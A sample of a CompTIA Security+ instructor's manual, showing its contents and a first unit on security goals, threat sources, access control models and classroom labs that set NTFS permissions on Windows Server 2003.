CompTIA Security+ Certification_ 2nd edit

Document Sample
CompTIA Security+ Certification_ 2nd edit Powered By Docstoc
					CompTIA Security+
Certification

Instructor’s Edition
Contents
    Introduction                                                                                                          v
        Topic A:      About the manual............................................................................... vi
        Topic B:      Setting student expectations .............................................................. xi
        Topic C:      Classroom setup................................................................................ xix
        Topic D:      Support.............................................................................................xxvii

    Security overview                                                                                                   1-1
        Topic A: Introduction to network security....................................................... 1-2
        Topic B: Understanding security threats ......................................................... 1-5
        Topic C: Creating a secure network strategy................................................... 1-9
        Topic D: Windows Server 2003 server access control ................................... 1-13
        Unit summary: Security overview................................................................... 1-24

    Authentication                                                                                                      2-1
        Topic A: Introduction to authentication........................................................... 2-2
        Topic B: Kerberos............................................................................................ 2-8
        Topic C: Challenge Handshake Authentication Protocol ............................... 2-14
        Topic D: Digital certificates............................................................................ 2-16
        Topic E: Security tokens ................................................................................ 2-19
        Topic F: Biometrics........................................................................................ 2-22
        Unit summary: Authentication ........................................................................ 2-30

    Attacks and malicious code                                                                                          3-1
        Topic A: Denial of service attacks................................................................... 3-2
        Topic B: Man-in-the-middle attacks............................................................... 3-15
        Topic C: Spoofing........................................................................................... 3-18
        Topic D: Replays ............................................................................................ 3-25
        Topic E: TCP session hijacking...................................................................... 3-27
        Topic F: Social engineering ........................................................................... 3-29
        Topic G: Attacks against encrypted data ........................................................ 3-32
        Topic H: Software exploitation....................................................................... 3-37
        Unit summary: Attacks and malicious code.................................................... 3-51

    Remote access                                                                                                       4-1
        Topic A: Securing remote communications..................................................... 4-2
        Topic B: Authentication .................................................................................. 4-5
        Topic C: Virtual private networks .................................................................. 4-16
        Topic D: Telecommuting vulnerabilities ........................................................ 4-27
        Unit summary: Remote access ........................................................................ 4-31

    E-mail                                                                                                              5-1
        Topic A: Secure e-mail and encryption ........................................................... 5-2
        Topic B: PGP and S/MIME encryption.......................................................... 5-13
        Topic C: E-mail vulnerabilities....................................................................... 5-24
        Unit summary: E-mail ..................................................................................... 5-30

    Web security                                                                                                        6-1
        Topic A: SSL/TLS protocol............................................................................. 6-2
ii   CompTIA Security+ Certification

                      Topic B: Vulnerabilities of Web tools ........................................................... 6-15
                      Topic C: Configuring Internet Explorer security ........................................... 6-30
                      Unit summary: Web security .......................................................................... 6-40

                Directory and file transfer services                                                                              7-1
                      Topic A: Introduction to directory services..................................................... 7-2
                      Topic B: File transfer services........................................................................ 7-10
                      Topic C: File sharing...................................................................................... 7-25
                      Unit summary: Directory and file transfer services ........................................ 7-28

                Wireless and instant messaging                                                                                    8-1
                      Topic A: IEEE 802.11 ..................................................................................... 8-2
                      Topic B: WAP 1.x and WAP 2.0 ................................................................... 8-10
                      Topic C: Wired equivalent privacy ................................................................ 8-23
                      Topic D: Instant messaging ............................................................................ 8-36
                      Unit summary: Wireless and instant messaging ............................................. 8-42

                Network devices                                                                                                   9-1
                      Topic A: Understanding firewalls ................................................................... 9-2
                      Topic B: Routers ............................................................................................. 9-9
                      Topic C: Switches .......................................................................................... 9-16
                      Topic D: Telecom, cable modem, and wireless devices................................. 9-19
                      Topic E: Securing remote access ................................................................... 9-23
                      Topic F: Intrusion detection systems ............................................................. 9-26
                      Topic G: Network monitoring ........................................................................ 9-29
                      Unit summary: Network devices .................................................................... 9-36

                Transmission and storage media                                                                                  10-1
                      Topic A: Transmission media......................................................................... 10-2
                      Topic B: Storage media................................................................................. 10-11
                      Unit summary: Transmission and storage media........................................... 10-19

                Network security topologies                                                                                     11-1
                      Topic A: Security topologies.......................................................................... 11-2
                      Topic B: Network Address Translation.......................................................... 11-7
                      Topic C: Tunneling ....................................................................................... 11-21
                      Topic D: Virtual Local Area Networks ......................................................... 11-23
                      Unit summary: Network security topologies ................................................. 11-29

                Intrusion detection                                                                                             12-1
                      Topic A: Intrusion detection systems ............................................................. 12-2
                      Topic B: Network-based and host-based IDS ................................................ 12-5
                      Topic C: Active and passive detection .......................................................... 12-14
                      Topic D: Honeypots ...................................................................................... 12-20
                      Topic E: Incident response............................................................................ 12-25
                      Unit summary: Intrusion detection ................................................................ 12-28

                Security baselines                                                                                              13-1
                      Topic A: OS/NOS hardening.......................................................................... 13-2
                      Topic B: Network hardening......................................................................... 13-14
                      Topic C: Application hardening .................................................................... 13-23
                      Topic D: Workstations and servers ............................................................... 13-43
                      Unit summary: Security baselines ................................................................. 13-55
                                                                                                                   iii

Cryptography                                                                                                  14-1
    Topic A: Concepts of cryptography................................................................ 14-2
    Topic B: Public Key Infrastructure (PKI)...................................................... 14-11
    Topic C: Key management and life cycle...................................................... 14-18
    Topic D: Setting up a certificate server ......................................................... 14-26
    Unit summary: Cryptography......................................................................... 14-41

Physical security                                                                                             15-1
    Topic A: Access control.................................................................................. 15-2
    Topic B: Environment ................................................................................... 15-12
    Unit summary: Physical security.................................................................... 15-18

Disaster recovery and business continuity                                                                     16-1
    Topic A: Disaster recovery ............................................................................. 16-2
    Topic B: Business continuity......................................................................... 16-11
    Topic C: Policies and procedures .................................................................. 16-14
    Topic D: Privilege management .................................................................... 16-24
    Unit summary: Disaster recovery and business continuity ............................ 16-28

Computer forensics and advanced topics                                                                        17-1
    Topic A: Understanding computer forensics .................................................. 17-2
    Topic B: Risk identification............................................................................ 17-9
    Topic C: Education and training.................................................................... 17-11
    Topic D: Auditing .......................................................................................... 17-14
    Topic E: Documentation................................................................................ 17-17
    Unit summary: Computer forensics and advanced topics .............................. 17-21

Certification exam objectives map                                                                             A-1
    Topic A: Comprehensive exam objectives ......................................................A-2

Course summary                                                                                                S-1
    Topic A: Course summary ............................................................................... S-2
    Topic B: Continued learning after class .......................................................... S-7

Glossary                                                                                                      G-1

Index                                                                                                          I-1
                                                                 1–1


Unit 1
Security overview
                    Unit time: 60 minutes

                    Complete this unit, and you’ll know how to:

                    A Discuss network security.

                    B Discuss security threat trends and their
                       ramifications.

                    C Determine the factors involved in creating
                       a secure network strategy.

                    D Control access to a Windows Server 2003
                       server.
1–2           CompTIA Security+ Certification


Topic A: Introduction to network security
Explanation              As personal and business-critical applications become more prevalent on the Internet,
                         network-based applications and services can pose security risks to all information
                         resources. Network security has not been given the attention it deserves, information is
                         an asset, and must be protected. Without adequate protection or network security, a
                         company is highly susceptible to a financial or commercial loss. The fear of a security
                         breach can be just as debilitating to a business as an actual breach. The distrust of the
                         Internet can limit business opportunities for organizations, especially those that are
                         100% Web-based. It’s imperative that organizations enact security policies and
                         procedures and incorporate safeguards that are effective and perceived effective by
                         potential customers.
                         Network security is the process by which digital information assets are protected. The
                         goals of network security are to maintain integrity, protect confidentiality, and assure
                         availability. This includes, but is not limited to, enforcing copyright and privacy laws,
                         protecting against data loss, and ensuring systems are available on an uninterrupted
                         basis.
                         The growth of computing has generated enormous advances in the way people live and
                         work. For the Internet to achieve its potential usefulness, it’s important that all networks
                         are protected from threats and vulnerabilities.
                         A threat is defined as any activity that poses a danger to your information. A
                         vulnerability is a weakness in a system, such as misconfigured hardware or software,
                         poor design, or end-user carelessness. Threats exploit vulnerabilities in order to gain
                         unauthorized access to a network.
                         Security risks cannot be completely eliminated or prevented, but with effective risk
                         management and assessment, the risks can be minimized to an acceptable level. What is
                         acceptable depends on how much risk the individual or organization is willing to
                         assume. The risk is worth assuming if the benefits of implementing the risk-reducing
                         safeguards far exceed the costs.

                         Effect of evolving technologies on security
                         When networks were first implemented, they consisted of dumb terminals connected to
                         a central mainframe computer. The mainframe was kept in a well-secured computer
                         room and users could connect only via dumb terminals from approved locations over
                         static, point-to-point connections. A username and password were required to access the
                         system and user-access was restricted. Security was very simple given those
                         circumstances.
                         With the development of more extensive network infrastructures made up of hardware
                         and software (specifically, PCs, LANs and WANs), global access to information
                         dramatically increased, as did the need for advanced network security.
                             • The introduction of firewalls in 1995 allowed successful businesses to balance
                               security with simple outbound access to the Internet (mostly for e-mail and Web
                               surfing), creating a positive impact to the bottom line of those businesses.
                             • The growth of extranets realized tremendous corporate cost savings by
                               connecting internal systems to business partners, by connecting sales-force
                               automation systems to mobile employees, and by providing electronic commerce
                               connections to business customers and consumers.
                             • The proliferation of firewalls began to be augmented by intrusion detection,
                               authentication, authorization, and vulnerability assessment systems.
                                                                Security overview      1–3

Today, companies are achieving a balance by keeping the bad guys out with
increasingly complex ways of letting the good guys in.

Managing risk
Security is critical for all types of Internet businesses, by protecting high-availability
systems from intrusion and corruption, security technologies help companies build trust
with their employees, suppliers, partners, and customers—a trust that information is
protected and transactions are reliable.
When most people talk about security, they mean ensuring that users:
  1 Can perform only tasks they are authorized to do
  2 Can obtain only information they are authorized to have
  3 Cannot cause damage to the data, applications, or operating environment of a
     system
The word “security” connotes protection against malicious attack by outsiders; security
also involves controlling the effects of errors and equipment failures. Anything that can
protect against an attack can prevent random misfortune as well.

Goals of network security
The goal of implementing network security is to maintain an acceptable level of
integrity, confidentiality, and availability concerning your data.

Integrity
Integrity refers to the assurance that data is not altered or destroyed in an unauthorized
manner. Integrity is maintained when the message received is identical to the message
sent. Even for data that is not confidential, data integrity must be maintained. For
example, you might not care if anyone sees your routine business transaction, but you
would certainly care if the transaction were modified.

Confidentiality
Confidentiality is the protection of data from unauthorized access by or disclosure to a
third party. Whether it is customer data or internal company data, a business is
responsible for protecting the privacy of its data.
Proprietary company information that is sensitive in nature also needs to remain
confidential. Only authorized parties should be granted access to information that has
been identified as confidential. The transmission of such information should be
performed in a secure manner, preventing any unauthorized access en route.

Availability
Availability is defined as the assurance that computer services can be accessed when
needed, and is the opposite of denial-of-service attacks, which slow down or even crash
systems by engulfing network equipment with useless noise. Applications require
differing availability levels, depending on the business impact of downtime. For an
application to be available, all components, including application and database servers,
storage devices, and the end-to-end network, must provide continuous service.
The increasing dependence of businesses and organizations on networked applications
and the Internet, together with the convergence of voice with data, increases
requirements for highly available applications. System downtime of any sort might
result in lack of credibility, lower customer satisfaction, and lost revenues.
1–4      CompTIA Security+ Certification

Do it!              A-1:      Discussing network security
                      Questions and answers
                       1 What are the goals of security? (Choose all that apply.)
                          A      Maintain integrity
                          B      Protect confidentiality
                          C      Assure availability
                          D      Improve performance

                       2 Which one of the following types of access can be threats to networks?
                          A      Authorized
                          B      Needed
                          C      Unauthorized
                          D      Invalid

                       3 Integrity is maintained when the message sent is identical to the message received.
                         True or false?

                          True

                       4 Confidentiality is the protection of data from authorized disclosure to a third
                         party. True or false?

                          False: It is the protection of data from unauthorized disclosure to a third party.

                       5 Availability is defined as the continuous operation of computing systems. True or
                         false?

                          True
                                                                              Security overview      1–5


Topic B: Understanding security threats
Explanation   The goals of network security are integrity, confidentiality, and availability. Data threats
              are pervasive in today’s society however, and continue to challenge even the most
              secure systems. Among these threats are:
                  • Corporate espionage — The FBI estimates every year U.S. companies lose up to
                    $100 billion in business profits because of information theft. This often stems
                    from reports and confidential information being thrown in the trash.
                  • Identity theft — According to the Identity Theft Resource Center, each year over
                    700,000 Americans have their personal information used illegally.
                  • Computer viruses — Computer Economics magazine reports the estimated
                    worldwide impact of malicious code was 13.2 billion dollars in the year 2001
                    alone.
              Each company must weigh the cost of network security against the cost of lost assets
              and decide how much they are willing to risk.
              When data integrity is compromised, an organization must incur extremely high costs to
              correct the consequences of attacks. If an unauthorized user makes changes to a Web
              site that provides the customers with the wrong information about specific items, the
              organization must further invest to correct the Web site and address any public relations
              issues with customers.
              When data confidentiality is compromised, the consequences to the organization are not
              always immediate, but they are usually costly. Unauthorized users might find scientific
              data on company research and steal it to use for their own competitive advantage.
              When application availability is compromised by network outages, organizations can
              lose millions of dollars in just a few hours. Unauthorized users can take down Web
              servers and not allow customers to view and obtain information they need. This could
              cause the customer to go elsewhere for services.
              The compromising of each of these three security goals can dearly cost an organization.
              Sometimes the costs are direct, such as when data integrity is compromised or when an
              e-commerce Web site is rendered unavailable by a denial of service attack. Other times,
              the costs are indirect, such as when corporate secrets have been stolen or when users
              lose productivity due to down time.

              Sources of threats
              There are four primary causes for compromised security:
                  • Technology weaknesses
                  • Configuration weaknesses
                  • Policy weaknesses
                  • Human error or malice
1–6   CompTIA Security+ Certification

                 Technology weaknesses
                 Computer and network technologies have intrinsic security weaknesses in the following
                 areas:
                     • TCP/IP — A communication protocol suite for routed networks, TCP/IP was
                        designed as an open standard to facilitate communications. Due to its wide
                        usage, there are plenty of experts and expert tools that can compromise this open
                        technology. It cannot guard a network against message-modification attacks or
                        protect connections against unauthorized-access attacks.
                     • Operating systems — Such as UNIX, Linux, Windows NT and 95, and OS/2
                       need the latest patches, updates, and upgrades applied to protect users.
                     • Network equipment — Routers, firewalls, and switches must be protected
                       through the use of password protection, authentication, routing protocols, and
                       firewalls.

                 Configuration weaknesses
                 Even the most secure technology can be misconfigured. Security problems are often
                 caused by one of the following configuration weaknesses:
                     • Unsecured accounts — User account information might be transmitted
                        unsecurely across the network, exposing usernames and passwords to sniffers,
                        which are programs for monitoring network activity, capable of capturing and
                        analyzing IP packets on an Ethernet network or dial-up connection.
                     • System accounts with easily guessed passwords — Poorly administered
                        password policies can cause problems in this area.
                     • Misconfigured Internet services — A common problem is to turn on Java and
                       JavaScript in Web browsers, enabling attacks via hostile Java applets. Another
                       problem is putting high-security data on a Web server; this type of data (social
                       security numbers, credit card numbers) should be behind a firewall and require
                       user authentication and authorization to access.
                     • Unsecured default settings — Many products have default settings that enable
                       security holes (for example, UNIX sendmail and X Windows).
                     • Misconfigured network equipment — Misconfiguration of network devices can
                       cause significant security problems. For example, misconfigured access lists,
                       routing protocols, or Simple Network Management Protocol (SNMP)
                       community strings can open up large security holes.
                     • Trojan horse programs — Delivery vehicles for destructive code, these appear to
                       be harmless programs but are enemies in disguise. They can delete data, mail
                       copies of themselves to e-mail address lists, and open up other computers for
                       attack.
                     • Vandals — These software applications or applets can destroy a single file or a
                       major portion of a computer system.
                     • Viruses — These are the largest threat to network security and have proliferated
                       in the past few years. They are designed to replicate themselves and infect
                       computers when triggered by a specific event. The effect of some viruses is
                       minimal and only an inconvenience, while others are more destructive and cause
                       major problems, such as deleting files or slowing down entire systems.
                                                             Security overview         1–7

Human error and malice
Human error and malice constitute a significant percentage of breaches in network
security. Even well trained and conscientious users can cause great harm to security
systems, often without knowing it.
Well-intentioned users can contribute to security breaches in several ways:
    • Accident — The mistaken destruction, modification, disclosure, or incorrect
      classification of information.
    • Ignorance — Inadequate security awareness, lack of security guidelines, lack of
      proper documentation, lack of knowledge. Users might inadvertently give
      information on security weaknesses to attackers.
    • Workload — Too many or too few system administrators.
Conversely, ill-willed employees or professional hackers and criminals can access
valuable assets through deceit:
    • Dishonesty — Fraud, theft, embezzlement, and the selling of confidential
      corporate information.
    • Impersonation — Attackers might use the telephone to impersonate employees
      to persuade users or administrators to give out usernames, passwords, modem
      numbers, and so on.
    • Disgruntled employees — Those who have been fired, laid off, or reprimanded
      might infect the network with a virus or delete files. Usually one of the largest
      security threats, these people know the network and the value of the information
      on it.
    • Snoops — Individuals who take part in corporate espionage by gaining
      unauthorized access to confidential data and providing this information to
      competitors.
    • Denial-of-service attacks — These attacks engulf network equipment with
      useless noise, thereby causing systems to slow down or even crash.
1–8      CompTIA Security+ Certification

Do it!              B-1:      Identifying security threats
                      Questions and answers
                       1 Which of the following computer and network technologies have intrinsic security
                         weaknesses?
                          A      TCP/IP
                          B      Operating systems
                          C      Network equipment
                          D      All of the above

                       2 What is a crime called in which one person masquerades under the identity of
                         another?
                          A      Identity theft
                          B      Confidentiality
                          C      Integrity
                          D      All of the above

                       3 Which of the following is not a primary cause of network security threats?
                          A      Encryption
                          B      Technology weaknesses
                          C      Policy weaknesses
                          D      Configuration weaknesses
                          E      Human error

                       4 Trojan horses are destructive programs that masquerade as benign applications.
                         True or false?

                          True

                       5 Which of the following is not considered a configuration weakness?
                          A      Unsecured accounts
                          B      Misconfigured Internet services
                          C      Misconfigured access lists
                          D      Human ignorance
                                                                            Security overview       1–9


Topic C: Creating a secure network strategy
Explanation   The most important goal of network security is to achieve the state where any action
              that is not expressly permitted is prohibited. To be successful, a network strategy must
              address both internal and external threats.
              Successful strategies look at technical threats and their appropriate responses. They are
              used to develop the necessary network security policies and procedures for the response
              effort. A strong security strategy defines policies and procedures and reduces risk across
              perimeter security, the Internet, intranets, and LANs.
              When planning a strong security strategy, here are some things to consider:
                  • Human factors
                  • Knowing your weaknesses
                  • Limiting access
                  • Achieving security through consistency
                  • Physical security
                  • Perimeter security
                  • Firewalls
                  • Web and file servers
                  • Access control
                  • Change management
                  • Encryption
                  • Intrusion detection systems

              Human factors
              Many security procedures fail because their designers do not truly consider the users.
              You might want to consider the following questions:
                  • Does your network security system recognize that a user has tried to log on to
                    more than one computer at the same time?
                  • Can staff members who forgot to log off at work also log on from home using
                    remote dial-up?
                  • Can staff members log on to the network from a machine other than their own?
                  • Is your security policy built into network management tools so the
                    misconfiguration of a server or router is flagged and noticed?
                  • Can an employee remove a hard disk, or add a ZIP drive, CD-R, flash drive, or
                    other removable storage device to a desktop without anyone noticing?
              Security must be sold to your users and compliance must be enforced. Users must
              understand and accept the need for security. To reduce your security risk, you must
              know where your users are, electronically and physically, and whether they are
              following security policy.
1–10   CompTIA Security+ Certification

                  Knowing your weaknesses
                  Every security system has vulnerabilities. Attack your own system to determine where
                  your weaknesses are located. Once you identify your weaknesses, you can plug those
                  holes effectively.
                  Determine the areas that present the largest danger to your system and prevent access to
                  them immediately. Add more security to these areas. Is your weakness an internal
                  server, a firewall, a router, or improperly trained staff ? Develop a methodology for
                  testing and ensuring your systems remain safe.

                  Limiting access
                  The security of a system is only as good as the weakest security level of any single host
                  in the system. Not everyone needs to have authorization to every folder or document.
                  Segment your network users, files, and servers. For example, staff members in the
                  Accounting Department do not need access to personnel files in the Human Resource
                  Department.
                  The default access should be no access. From there, you open holes with permissions
                  and authentication allowing authorized users to access resources. If you start from this
                  premise, it’s easier than starting from “open access.”

                  Achieving security through consistency
                  Develop a change management process around your network. Whenever there are
                  network upgrades, whether patches, the addition of new users, or updating a firewall,
                  you should document the process and procedures. If you are thorough in documenting
                  the process, you limit your security risks. When you add new users to the network, do
                  you always do the same thing? What if you forget a step? Is your security breached? Be
                  methodical and follow a written process.

                  Physical security
                  It makes no sense to install complicated software security measures when access to the
                  hardware is not controlled. Require authorization into your network room and the
                  different closets in which network equipment is kept; otherwise, unauthorized users can
                  easily access and destroy network equipment in seconds.

                  Perimeter security
                  Perimeter security is controlling access to critical network applications, data, and
                  services. The services offered include secure Web and file servers, gateways, remote
                  access, and naming services. Each organization should be prepared to select perimeter
                  security tools based on their network requirements and budget. Along with the network,
                  for successful perimeter security, blueprints for all campus grounds and buildings are
                  necessary. In addition, all hardware, PCs, and software components must be
                  documented.

                  Firewalls
                  A firewall is a hardware or software solution that contains programs designed to enforce
                  an organization’s security policies by restricting access to specific network resources.
                  The firewall creates a protective layer between the network and the outside world. The
                  firewall has built-in filters that can be configured to deny unauthorized or dangerous
                  materials from entering the network. Firewalls log attempted intrusions and create
                  reports.
                                                               Security overview    1–11

Web and file servers
Organizations must test mission-critical hosts, workstations, and servers for
vulnerabilities. Determine if your organization has the in-house expertise and
experience to successfully test the network. If not, outsourcing to a reputable security
assessment organization is recommended.

Access control
Access control ensures that legitimate traffic is allowed into or out of your network.
This is done by having users identify themselves via passwords to prove their identity at
login. In addition, access must be permitted or denied for each application, function, and
file. Most attacks against networks are instances when unauthorized people find a way
through the login system. This type of attack happens by guessing or stealing a user
identity that is recognized by the system. These attacks are successful because existing
networks utilize access control systems, which merely involve entering a user identity
together with a password. With this limited security, attacks are simple and common.
Many systems do not log invalid password entries into their systems, allowing an
attacker to be more persistent. Hackers can continue trying different passwords
repeatedly without being noticed.
Another type of access control is personal identification numbers (PINs). These are
commonly used at banks. The only difference between passwords and PINs is that PINs
are usually all numeric and only a few characters long.
Security tokens are gaining popularity as well. This hardware plugs into computing
devices and dynamically generates a new password at each login. This is done
automatically for the user once the user authenticates with a password.
Smartcards, with embedded chips, contain code that identifies its holder, or contain keys
that can read and send encrypted data. These cards are becoming more popular and are
very useful for maintaining security.

Change management
Change management is a set of procedures developed by network staff that are followed
whenever a change is made to the network. Most organizations focus on servers and do
not document changes to the backbone, which touches the entire network infrastructure.
It is important to document changes to all areas of your IT infrastructure.

Encryption
Encryption ensures messages cannot be intercepted or read by anyone other than their
intended audience. Encryption is usually implemented to protect data that is transported
over the public network; it uses advanced algorithms to scramble messages and their
attachments.

Intrusion detection systems
An intrusion detection system (IDS) provides 24/7 network surveillance. It analyzes
packet data streams within the network and searches for unauthorized activity. When
unauthorized activity is detected, the IDS can send alarms to a management console
with details of the activity and can order other systems to cut off the unauthorized
session.
1–12     CompTIA Security+ Certification

Do it!              C-1:      Discussing strategies to secure your network
                      Questions and answers
                       1 Ideally, the administrator should give everyone access to everything and start
                         securing when a problem arises. True or false?

                          False: Start with a default of no access and assign permissions on a need-to-use basis.

                       2 Which of the following is considered a successful approach to network security?
                          A    Knowing your weaknesses
                          B    Determining the cost
                          C    Remembering human factors
                          D    Controlling secrets
                          E    All of the above

                       3 Which of the following is/are incorrect about firewalls?
                          A    Restricts access to specific network resources
                          B    Contains built-in filters
                          C    Creates a protective layer between the network and the outside world
                          D    Is a hardware only solution

                       4 Examples of access controls might include which of the following?
                          A    Smartcards
                          B    Security token
                          C    PINs
                          D    All of the above
                                                                                         Security overview       1–13


Topic D: Windows Server 2003 server access
         control
              This topic covers the following CompTIA Security+ exam objectives.

               #        Objective

               1.1      Recognize and be able to differentiate and explain the following access control models
                         • MAC
                         • DAC
                         • RBAC

               5.5      Explain the following concepts of privilege management
                         • MAC / DAC / RBAC (Mandatory Access Control / Discretionary Access Control / Role
                           Based Access Control)




              Introducing server access control
Explanation   Access control is a policy, software component, or hardware component that is used to
              restrict access to a resource. This could be a password, keypad, badge, or set of
              permissions granted to the resource. When applied, several levels of security must be
              passed:
                     • Identify — The user must show identification. This might involve showing a
                       badge or driver’s license, entering a logon ID, or swiping a card.
                     • Authenticate — The user is authenticated to the network. This can be
                       accomplished with a password, PIN, hand scan, or signature.
                     • Authorize — The system restricts the user’s access to a particular resource based
                       on a predetermined set of policies.

              MAC, DAC, and RBAC
              In discussing access to a resource, three access control models must be addressed:
                     • Mandatory access control (MAC)
                     • Discretionary access control (DAC)
                     • Role-based access control (RBAC)

              MAC
              Mandatory access control (MAC) is a non-discretionary control used in high-security
              locations. Here, you classify all users and resources and assign a security level to the
              classification. Access requests are denied if the user’s security level does not match or
              exceed the security level of the resource. For example, military personnel must have a
              high-security clearance to read or revise secured documents.
1–14   CompTIA Security+ Certification

                  DAC
                  Discretionary access control (DAC) allows an owner of a file to dictate who can access
                  the file and to what extent. The owner of the resource creates an access control list
                  (ACL) to list the users with access and the type of access (permissions). Most operating
                  systems provide some form of the read, write, execute, modify, and delete permissions.
                  One of the drawbacks to this method is that each owner controls the access levels to his
                  or her personal files. With inappropriate access control, confidential information can be
                  accidentally or deliberately compromised, or resources can be rendered inaccessible.
                  The assumption is that the owner of the file has the expertise to manage the access
                  levels appropriately.

                  RBAC
                  Role-based access control (RBAC), not to be confused with rule-based access control, is
                  based on the role a user plays in the organization. Instead of giving access to individual
                  users, access control is granted to groups of users who perform a common function.
                  This allows for centralized administration, where access to resources is defined based
                  on roles, and each user is assigned one or more roles. This is considered a non-
                  discretionary access control.

                  Using NTFS to implement access control
                  Almost all network operating systems allow administrators to define or set DAC
                  settings. Windows NT, 2000, Server 2003, and XP Professional computers set DAC
                  values using Windows Explorer.
                  To implement local file security on a Windows NT-based computer, you must convert
                  the FAT partition(s) to NTFS format.
                                                                                          Security overview      1–15

Do it!                          D-1:   Converting to an NTFS system
                                 Here’s how                           Here’s why

       Tell students this
                                 1 Log on to the Windows Server
activity will show them            2003 server as Administrator
how to determine whether
a file partition is FAT or       2 Click Start
NTFS, as well as how to
convert a FAT partition to
NTFS.
                                   Choose Run

                                   Type cmd

                                   Press e                            To access the command window.

The FAT partition in this        3 At the command line, enter         To determine whether a file partition is FAT or
lab will be designated as          chkntfs e:                         NTFS.
drive letter E. However, if
you have more drives
                                                                      You will see the message, “The type of the file
installed, this might be a
higher letter than E:. Be                                             system is FAT 32. E: is not dirty”. This indicates
sure students do not                                                  that NTFS was not yet installed and there is no
change drive C:.                                                      corruption on the drive.

                                 4 At the command line, enter         To convert the FAT partition to NTFS.
                                   convert e: /fs:ntfs

       If students convert       5 If the drive has a volume label,   Windows will then convert the drive to NTFS.
the system partition, they’ll      enter it when prompted
have to reboot for the
conversion to take place.
                                 6 At the command line, enter         To verify that the drive is now NTFS.
                                   chkntfs e:

                                 7 Enter exit                         To close the Command window.
1–16          CompTIA Security+ Certification

                           Data confidentiality
Explanation                After a secure file system is installed, you can begin to think about data confidentiality.
                           Data confidentiality refers to making sure only those intended to have access to certain
                           data actually have that access. With the FAT file system, this is not possible at the local
                           level, but with NTFS, you can lock down both folders and files locally. NTFS can be
                           used to protect data from intruders who might have physical access to the computer
                           containing the data. Exhibit 1-1 shows the default NTFS permissions.




                           Exhibit 1-1: Default NTFS permissions on a Windows Server 2003 server


Do it!                     D-2:     Ensuring data confidentiality
                            Here’s how                                  Here’s why

      In this activity,
                             1 Open My Computer                         Click Start and choose My Computer.
students will create a
folder and files, assign        Double-click the E: drive               This should be the drive that was converted
NTFS permissions, and                                                   from FAT to NTFS.
then verify whether the
data is confidential.        2 Create a new folder called Confidentiality

                             3 Double-click the Confidentiality folder

                             4 Create a new folder called User1Folder

                             5 Right-click User1Folder

                                Choose Properties                       The User1Folder Properties screen appears.

                             6 Activate the Security tab                The Security tab is displayed, as shown in
                                                                        Exhibit 1-1.
                                                                                      Security overview      1–17

                             7 Click Advanced

                             8 Clear Allow inheritable            You’ll be prompted to Copy, Remove, or
                               permissions from parent            Cancel.
                               to propagate to this object
                               and all child objects.
                               Include these with entries
                               explicitly defined here.

                             9 Click Copy                         To retain the permissions.

                            10 Click OK                           To return to the Security tab.

                            11 Click Add…                         To start the process of adding access
                                                                  permissions for User1.

                                                                  The Select Users or Groups window appears.

                            12 Click Advanced…

                            13 Click Find Now                     To identify users and groups on the system.

                               Under Search results, select       You might have to scroll to see User1.
                               User1

                               Click OK twice                     To add User1 to the access control list.

                            14 With User1 still highlighted,
                               select Allow for Full Control




                                                                  Full Control activates all other permissions in
                                                                  the list.

                            15 Select each group in the list of   To remove the Administrators, Creator Owner,
       Make sure students
don't remove User1.            Group or user names and Click      System and Users groups from the access
                               Remove for each group              control list. Do not remove User1.

                               Click OK                           To save the changes.

                            16 Double-click User1Folder           You are denied access because you granted
                                                                  access to the folder only to User1.

                            17 Close all windows and log off

                            18 Log on as User1 and navigate to    To verify that User1 has access to the folder.
      Tell students User1
does not have a                the User1Folder                    You should be able to open the folder.
password.
                            19 Close all windows and log off
1–18          CompTIA Security+ Certification

                            Data availability
Explanation                 Although it is important that data remains secure and confidential, it is just as important
                            that the data is available when needed. Secured data that is inaccessible results in
                            downtime and is detrimental to a business and its ability to serve customers.
                            Technologies such as clustering and load balancing can help, but if NTFS permissions
                            are assigned inappropriately, these features will not remedy the situation.

Do it!                      D-3:     Making data available
                             Here’s how                                 Here’s why

      In this activity,
                              1 Log on to the Windows Server
students will examine how       2003 server as Administrator
NTFS permissions affect a
user’s access to              2 Open My Computer
resources.
                                 Double-click the E: drive

                              3 Create a new folder called
                                Availability

                              4 Double-click the Availability
                                folder

                              5 Create a folder called User2Folder

                              6 Right-click User2Folder

                                 Choose Properties                      To open the User2Folder Properties window.

                              7 Activate the Security tab

                              8 Click Advanced

                              9 Clear Allow inheritable                 You’ll be prompted to Copy, Remove, or
                                 permissions from parent                Cancel.
                                 to propagate to this object
                                 and all child objects.
                                 Include these with entries
                                 explicitly defined here.

                             10 Click Remove                            To clear the permissions.

                             11 Click OK                                To return to the Security tab.

                             12 Click Yes                               To acknowledge the Security message and
                                                                        continue.

                             13 Click Add…                              To open the Select Users or Groups window.

                             14 Click Advanced…
                                                                                       Security overview       1–19

                            15 Click Find Now

                               Select User2                        You might have to scroll to see the user.

                               Click OK twice                      To add User2 to the access control list.

                            16 With User2 still highlighted,       To assign User2’s permissions.
                               select Allow for Full Control

                               Click OK                            To save the changes.

                            17 Close all windows and log off

      Point out to
                            18 Log on as User2
students that User2 does
not require a password to   19 Verify that you have access to
log on.                        e:\Availability\User2Folder

                            20 Close all windows and log off

                            21 Log on as Administrator

                            22 Delete the User2 account from the   Click Start, right-click My Computer and choose
                               local security database             Manage. Expand Local Users and Groups.
                                                                   Select Users and delete User2.

                            23 Create a new user, also named       With Users selected, choose Action, New User.
                               User2                               Enter User2 as the User name, clear User must
                                                                   change password at next logon and click Create.
                                                                   Click Close.

                            24 Display the Security tab in the
                               properties of
                               e:\Availability\User2Folder




                                                                   Notice that the User2 account is no longer listed,
                                                                   but the account’s SID is.

                            25 Logon as User2 and try to access    You are denied access to this folder.
                               the e:\Availability\
                               User2Folder

                            26 Close all windows and log off
1–20          CompTIA Security+ Certification

                         Data integrity
Explanation              After data is secured properly and available to the appropriate people, it is important to
                         make sure the contents of the data have not been altered accidentally or intentionally.
                         Malicious corruption is a problem, and can be done by a virus, worm, or hacker.
                         Accidental changes, however, can also damage data integrity. For example, Windows
                         Server 2003 file synchronization capabilities could easily lead to accidental corruption.
                         Changes made to data that conflict with other changes to the same data could damage
                         data integrity just as much as a hacker can. Environmental problems can lead to data
                         integrity issues, such problems include; dust, surges, and excessive heat.
                         Windows Server 2003 default permissions are configured in such a way that only the
                         creator of a file and users who belong to the System Administrators group can change a
                         file by default. Members of the Users group can view a file by default, but cannot make
                         changes. To enable others to change a file, permissions have to be specifically assigned.
                                                                      Security overview      1–21

Do it!   D-4:   Maintaining data integrity
          Here’s how                              Here’s why
          1 Log on to the Windows Server
            2003 server as User1

          2 In My Computer, display the E:
            drive

          3 Create a new folder called
            Integrity

